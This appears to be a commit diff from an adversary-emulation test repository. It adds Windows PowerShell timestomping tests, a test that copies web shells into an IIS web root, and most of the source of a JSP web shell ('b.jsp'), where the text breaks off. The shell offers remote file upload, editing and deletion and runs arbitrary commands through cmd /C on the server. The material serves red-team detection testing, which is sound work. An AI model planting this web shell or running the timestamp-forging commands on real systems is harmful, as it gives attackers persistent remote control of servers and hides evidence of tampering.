- [Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell](#atomic-test-6---windows---modify-file-last-modified-timestamp-with-powershell)
- [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell)
<br/>
@@ -95,3 +101,66 @@ This technique was used by the threat actor Rocke during the compromise of Linux
touch -acmr #{reference_file_path} {target_file_path}
```
<br/>
<br/>
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
Modifies the file creation timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
<br/>
<br/>
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
Modifies the file last modified timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
<br/>
<br/>
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
Modifies the last access timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
<br/>
atomics/T1099/T1099.yaml
+66
View File
@@ -81,3 +81,69 @@ atomic_tests:
name: sh
command: |
touch -acmr #{reference_file_path} {target_file_path}
- name: Windows - Modify file creation timestamp with PowerShell
description: |
Modifies the file creation timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path of file to change creation timestamp
type: Path
default: C:\Some\file.txt
target_date_time:
description: Date/time to replace original timestamps with
type: String
default: '1970-01-01 00:00:00'
executor:
name: command_prompt
command: |
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
- name: Windows - Modify file last modified timestamp with PowerShell
description: |
Modifies the file last modified timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path of file to change last modified timestamp
type: Path
default: C:\Some\file.txt
target_date_time:
description: Date/time to replace original timestamps with
type: String
default: '1970-01-01 00:00:00'
executor:
name: command_prompt
command: |
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
- name: Windows - Modify file last access timestamp with PowerShell
description: |
Modifies the last access timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path of file to change last access timestamp
type: Path
default: C:\Some\file.txt
target_date_time:
description: Date/time to replace original timestamps with
type: String
default: '1970-01-01 00:00:00'
executor:
name: command_prompt
command: |
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
atomics/T1100/T1100.md
+32
View File
@@ -0,0 +1,32 @@
# T1100 - Web Shell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1100)
<blockquote>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Web Shell Written to Disk](#atomic-test-1---web-shell-written-to-disk)
<br/>
## Atomic Test #1 - Web Shell Written to Disk
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\|
#### Run it with `command_prompt`!
```
xcopy #{web_shells} #{web_shell_path}
```
<br/>
atomics/T1100/T1100.yaml
+26
View File
@@ -0,0 +1,26 @@
---
attack_technique: T1100
display_name: Web Shell
atomic_tests:
- name: Web Shell Written to Disk
description: |
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
supported_platforms:
- windows
input_arguments:
web_shell_path:
description: The path to drop the web shell
type: string
default: C:\inetpub\wwwroot
web_shells:
description: Path of Web Shell
type: path
default: C:\AtomicRedTeam\atomics\T1100\shells\
executor:
name: command_prompt
command: |
xcopy #{web_shells} #{web_shell_path}
atomics/T1100/shells/b.jsp
+1964
View File
@@ -0,0 +1,1964 @@
<%--
Document : Browser
Created on : 3/Out/2011, 21:18:45
Author : jeanfigueiredo
--%>
<%@page import="java.text.DateFormat"%>
<%--
jsp File browser 1.2
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the
Free Software Foundation, Inc.,
59 Temple Place, Suite 330,
Boston, MA 02111-1307 USA
- Description: jsp File browser v1.2 -- This JSP program allows remote web-based
file access and manipulation. You can copy, create, move and delete files.
Text files can be edited and groups of files and folders can be downloaded
as a single zip file that's created on the fly.
- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
--%>
<%@page import="java.util.*,
java.net.*,
java.text.*,
java.util.zip.*,
java.io.*"
%>
<%!
//FEATURES
private static final boolean NATIVE_COMMANDS = true;
/**
*If true, all operations (besides upload and native commands)
*which change something on the file system are permitted
*/
private static final boolean READ_ONLY = false;
//If true, uploads are allowed even if READ_ONLY = true
private static final boolean ALLOW_UPLOAD = true;
//Allow browsing and file manipulation only in certain directories
private static final boolean RESTRICT_BROWSING = true;
//If true, the user is allowed to browse only in RESTRICT_PATH,
//if false, the user is allowed to browse all directories besides RESTRICT_PATH
private static final boolean RESTRICT_WHITELIST = false;
//Paths, sperated by semicolon
//private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
private static final String RESTRICT_PATH = "/etc;/var";
//The refresh time in seconds of the upload monitor window
private static final int UPLOAD_MONITOR_REFRESH = 2;
//The number of colums for the edit field
private static final int EDITFIELD_COLS = 85;
//The number of rows for the edit field
private static final int EDITFIELD_ROWS = 30;
//Open a new window to view a file
private static final boolean USE_POPUP = true;
/**
* If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
* created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
* This can yield to performance issues. Turn it off, if the directory loads to slow.
*/
private static final boolean USE_DIR_PREVIEW = false;
private static final int DIR_PREVIEW_NUMBER = 10;
/**
* The name of an optional CSS Stylesheet file
*/
private static final String CSS_NAME = "Browser.css";
/**
* The compression level for zip file creation (0-9)
* 0 = No compression
* 1 = Standard compression (Very fast)
* ...
* 9 = Best compression (Very slow)
*/
private static final int COMPRESSION_LEVEL = 1;
/**
* The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
* server runs on a windows platform, to avoid a message box, if you try to access
* an empty removable drive (See KNOWN BUGS in Readme.txt).
*/
private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
/**
* Command of the shell interpreter and the parameter to run a programm
*/
private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix
/**
* Max time in ms a process is allowed to run, before it will be terminated
*/
private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
//Button names
private static final String SAVE_AS_ZIP = "Download selected files as (z)ip";
private static final String RENAME_FILE = "(R)ename File";
private static final String DELETE_FILES = "(Del)ete selected files";
private static final String CREATE_DIR = "Create (D)ir";
private static final String CREATE_FILE = "(C)reate File";
private static final String MOVE_FILES = "(M)ove Files";
private static final String COPY_FILES = "Cop(y) Files";
private static final String LAUNCH_COMMAND = "(L)aunch external program";
private static final String UPLOAD_FILES = "Upload";
//Normally you should not change anything after this line
//----------------------------------------------------------------------------------
//Change this to locate the tempfile directory for upload (not longer needed)
private static String tempdir = ".";
private static String VERSION_NR = "1.2";
private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
//private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
/**
* This class is a comparator to sort the filenames and dirs
*/
class FileComp implements Comparator {
int mode;
int sign;
FileComp() {
this.mode = 1;
this.sign = 1;
}
/**
* @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
* The default sorting method is by Name
* Negative mode means descending sort
*/
FileComp(int mode) {
if (mode < 0) {
this.mode = -mode;
sign = -1;
}
else {
this.mode = mode;
this.sign = 1;
}
}
public int compare(Object o1, Object o2) {
File f1 = (File) o1;
File f2 = (File) o2;
if (f1.isDirectory()) {
if (f2.isDirectory()) {
switch (mode) {
//Filename or Type
case 1:
case 4:
return sign
* f1.getAbsolutePath().toUpperCase().compareTo(
f2.getAbsolutePath().toUpperCase());
//Filesize
case 2:
return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
//Date
case 3:
return sign
* (new Long(f1.lastModified())
.compareTo(new Long(f2.lastModified())));
default:
return 1;
}
}
else return -1;
}
else if (f2.isDirectory()) return 1;
else {
switch (mode) {
case 1:
return sign
* f1.getAbsolutePath().toUpperCase().compareTo(
f2.getAbsolutePath().toUpperCase());
case 2:
return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
case 3:
return sign
* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
case 4: { // Sort by extension
int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
return sign
* f1.getAbsolutePath().toUpperCase().compareTo(
f2.getAbsolutePath().toUpperCase());
}
// f1 has no extension
else if (tempIndexf1 == -1) return -sign;
// f2 has no extension
else if (tempIndexf2 == -1) return sign;
// Both have an extension
else {
String tempEndf1 = f1.getAbsolutePath().toUpperCase()
.substring(tempIndexf1);
String tempEndf2 = f2.getAbsolutePath().toUpperCase()
.substring(tempIndexf2);
return sign * tempEndf1.compareTo(tempEndf2);
}
}
default:
return 1;
}
}
}
}
/**
* Wrapperclass to wrap an OutputStream around a Writer
*/
class Writer2Stream extends OutputStream {
Writer out;
Writer2Stream(Writer w) {
super();
out = w;
}
public void write(int i) throws IOException {
out.write(i);
}
public void write(byte[] b) throws IOException {
for (int i = 0; i < b.length; i++) {
int n = b[i];
//Convert byte to ubyte
n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
out.write(n);
}
}
public void write(byte[] b, int off, int len) throws IOException {
for (int i = off; i < off + len; i++) {
int n = b[i];
n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
out.write(n);
}
}
} //End of class Writer2Stream
static Vector expandFileList(String[] files, boolean inclDirs) {
Vector v = new Vector();
if (files == null) return v;
for (int i = 0; i < files.length; i++)
v.add(new File(URLDecoder.decode(files[i])));
for (int i = 0; i < v.size(); i++) {
File f = (File) v.get(i);
if (f.isDirectory()) {
File[] fs = f.listFiles();
for (int n = 0; n < fs.length; n++)
v.add(fs[n]);
if (!inclDirs) {
v.remove(i);
i--;
}
}
}
return v;
}
/**
* Method to build an absolute path
* @param dir the root dir
* @param name the name of the new directory
* @return if name is an absolute directory, returns name, else returns dir+name
*/
static String getDir(String dir, String name) {
if (!dir.endsWith(File.separator)) dir = dir + File.separator;
File mv = new File(name);
String new_dir = null;
if (!mv.isAbsolute()) {
new_dir = dir + name;
}
else new_dir = name;
return new_dir;
}
/**
* This Method converts a byte size in a kbytes or Mbytes size, depending on the size
* @param size The size in bytes
* @return String with size and unit
*/
static String convertFileSize(long size) {
int divisor = 1;
String unit = "bytes";
if (size >= 1024 * 1024) {
divisor = 1024 * 1024;
unit = "MB";
}
else if (size >= 1024) {
divisor = 1024;
unit = "KB";
}
if (divisor == 1) return size / divisor + " " + unit;
String aftercomma = "" + 100 * (size % divisor) / divisor;
if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
return size / divisor + "." + aftercomma + " " + unit;
}
/**
* Copies all data from in to out
* @param in the input stream
* @param out the output stream
* @param buffer copy buffer
*/
static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
copyStreamsWithoutClose(in, out, buffer);
in.close();
out.close();
}
/**
* Copies all data from in to out
* @param in the input stream
* @param out the output stream
* @param buffer copy buffer
*/
static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
throws IOException {
int b;
while ((b = in.read(buffer)) != -1)
out.write(buffer, 0, b);
}
/**
* Returns the Mime Type of the file, depending on the extension of the filename
*/
static String getMimeType(String fName) {
fName = fName.toLowerCase();
if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
else if (fName.endsWith(".gif")) return "image/gif";
else if (fName.endsWith(".pdf")) return "application/pdf";
else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
else if (fName.endsWith(".avi")) return "video/x-msvideo";
else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
else if (fName.endsWith(".zip")) return "application/zip";
else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
else if (fName.endsWith(".rtf")) return "application/rtf";
else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
else if (fName.endsWith(".png")) return "image/png";
else if (fName.endsWith(".xml")) return "text/xml";
else if (fName.endsWith(".svg")) return "image/svg+xml";
else if (fName.endsWith(".mp3")) return "audio/mp3";
else if (fName.endsWith(".ogg")) return "audio/ogg";
else return "text/plain";
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String conv2Html(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
/**
* Starts a native process on the server
* @param command the command to start the process
* @param dir the dir in which the process starts
*/
static String startProcess(String command, String dir) throws IOException {
StringBuffer ret = new StringBuffer();
String[] comm = new String[3];
comm[0] = COMMAND_INTERPRETER[0];
comm[1] = COMMAND_INTERPRETER[1];
comm[2] = command;
long start = System.currentTimeMillis();
try {
//Start process
Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
//Get input and error streams
BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
boolean end = false;
while (!end) {
int c = 0;
while ((ls_err.available() > 0) && (++c <= 1000)) {
ret.append(conv2Html(ls_err.read()));
}
c = 0;
while ((ls_in.available() > 0) && (++c <= 1000)) {
ret.append(conv2Html(ls_in.read()));
}
try {
ls_proc.exitValue();
//if the process has not finished, an exception is thrown
//else
while (ls_err.available() > 0)
ret.append(conv2Html(ls_err.read()));
while (ls_in.available() > 0)
ret.append(conv2Html(ls_in.read()));
end = true;
}
catch (IllegalThreadStateException ex) {
//Process is running
}
//The process is not allowed to run longer than given time.
if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
ls_proc.destroy();
end = true;
ret.append("!!!! Process has timed out, destroyed !!!!!");
}
try {
Thread.sleep(50);
}
catch (InterruptedException ie) {}
}
}
catch (IOException e) {
ret.append("Error: " + e);
}
return ret.toString();
}
/**
* Converts a dir string to a linked dir string
* @param dir the directory string (e.g. /usr/local/httpd)
* @param browserLink web-path to Browser.jsp
*/
static String dir2linkdir(String dir, String browserLink, int sortMode) {
File f = new File(dir);
StringBuffer buf = new StringBuffer();
while (f.getParentFile() != null) {
if (f.canRead()) {
String encPath = URLEncoder.encode(f.getAbsolutePath());
buf.insert(0, "<a href=\"" + browserLink + "?sort=" + sortMode + "&amp;dir="
+ encPath + "\">" + conv2Html(f.getName()) + File.separator + "</a>");
}
else buf.insert(0, conv2Html(f.getName()) + File.separator);
f = f.getParentFile();
}
if (f.canRead()) {
String encPath = URLEncoder.encode(f.getAbsolutePath());
buf.insert(0, "<a href=\"" + browserLink + "?sort=" + sortMode + "&amp;dir=" + encPath
+ "\">" + conv2Html(f.getAbsolutePath()) + "</a>");
}
else buf.insert(0, f.getAbsolutePath());
return buf.toString();
}
/**
* Returns true if the given filename tends towards a packed file
*/
static boolean isPacked(String name, boolean gz) {
return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
.endsWith(".war"));
}
/**
* If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
*/
static boolean isAllowed(File path, boolean write) throws IOException{
if (READ_ONLY && write) return false;
if (RESTRICT_BROWSING) {
StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
while (stk.hasMoreTokens()){
if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
return RESTRICT_WHITELIST;
}
return !RESTRICT_WHITELIST;
}
else return true;
}
//---------------------------------------------------------------------------------------------------------------
%>
<%
//Get the current browsing directory
request.setAttribute("dir", request.getParameter("dir"));
// The browser_name variable is used to keep track of the URI
// of the jsp file itself. It is used in all link-backs.
final String browser_name = request.getRequestURI();
final String FOL_IMG = "";
boolean nohtml = false;
boolean dir_view = true;
//Get Javascript
if (request.getParameter("Javascript") != null) {
dir_view = false;
nohtml = true;
//Tell the browser that it should cache the javascript
response.setHeader("Cache-Control", "public");
Date now = new Date();
SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US);
response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2)));
response.setHeader("Content-Type", "text/javascript");
%>
<%// This section contains the Javascript used for interface elements %>
var check = false;
<%// Disables the checkbox feature %>
function dis(){check = true;}
var DOM = 0, MS = 0, OP = 0, b = 0;
<%// Determine the browser type %>
function CheckBrowser(){
if (b == 0){
if (window.opera) OP = 1;
// Moz or Netscape
if(document.getElementById) DOM = 1;
// Micro$oft
if(document.all && !OP) MS = 1;
b = 1;
}
}
<%// Allows the whole row to be selected %>
function selrow (element, i){
var erst;
CheckBrowser();
if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild;
else if (DOM==1) erst = element.firstChild.nextSibling.firstChild;
<%// MouseIn %>
if (i==0){
if (erst.checked == true) element.className='mousechecked';
else element.className='mousein';
}
<%// MouseOut %>
else if (i==1){
if (erst.checked == true) element.className='checked';
else element.className='mouseout';
}
<% // MouseClick %>
else if ((i==2)&&(!check)){
if (erst.checked==true) element.className='mousein';
else element.className='mousechecked';
erst.click();
}
else check=false;
}
<%// Filter files and dirs in FileList%>
function filter (begriff){
var suche = begriff.value.toLowerCase();
var table = document.getElementById("filetable");
var ele;
for (var r = 1; r < table.rows.length; r++){
ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,"");
if (ele.toLowerCase().indexOf(suche)>=0 )
table.rows[r].style.display = '';
else table.rows[r].style.display = 'none';
}
}
<%//(De)select all checkboxes%>
function AllFiles(){
for(var x=0;x < document.FileList.elements.length;x++){
var y = document.FileList.elements[x];
var ytr = y.parentNode.parentNode;
var check = document.FileList.selall.checked;
if(y.name == 'selfile' && ytr.style.display != 'none'){
if (y.disabled != true){
y.checked = check;
if (y.checked == true) ytr.className = 'checked';
else ytr.className = 'mouseout';
}
}
}
}
function shortKeyHandler(_event){
if (!_event) _event = window.event;
if (_event.which) {
keycode = _event.which;
} else if (_event.keyCode) {
keycode = _event.keyCode;
}
var t = document.getElementById("text_Dir");
//z
if (keycode == 122){
document.getElementById("but_Zip").click();
}
//r, F2
else if (keycode == 113 || keycode == 114){
var path = prompt("Please enter new filename", "");
if (path == null) return;
t.value = path;
document.getElementById("but_Ren").click();
}
//c
else if (keycode == 99){
var path = prompt("Please enter filename", "");
if (path == null) return;
t.value = path;
document.getElementById("but_NFi").click();
}
//d
else if (keycode == 100){
var path = prompt("Please enter directory name", "");
if (path == null) return;
t.value = path;
document.getElementById("but_NDi").click();
}
//m
else if (keycode == 109){
var path = prompt("Please enter move destination", "");
if (path == null) return;
t.value = path;
document.getElementById("but_Mov").click();
}
//y
else if (keycode == 121){
var path = prompt("Please enter copy destination", "");
if (path == null) return;
t.value = path;
document.getElementById("but_Cop").click();
}
//l
else if (keycode == 108){
document.getElementById("but_Lau").click();
}
//Del
else if (keycode == 46){
document.getElementById("but_Del").click();
}
}
function popUp(URL){
fname = document.getElementsByName("myFile")[0].value;
if (fname != "")
window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes")
}
document.onkeypress = shortKeyHandler;
<% }
// View file
else if (request.getParameter("file") != null) {
File f = new File(request.getParameter("file"));
if (!isAllowed(f, false)) {
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
}
else if (f.exists() && f.canRead()) {
if (isPacked(f.getName(), false)) {
//If zipFile, do nothing here
}
else{
String mimeType = getMimeType(f.getName());
response.setContentType(mimeType);
if (mimeType.equals("text/plain")) response.setHeader(
"Content-Disposition", "inline;filename=\"temp.txt\"");
else response.setHeader("Content-Disposition", "inline;filename=\""
+ f.getName() + "\"");
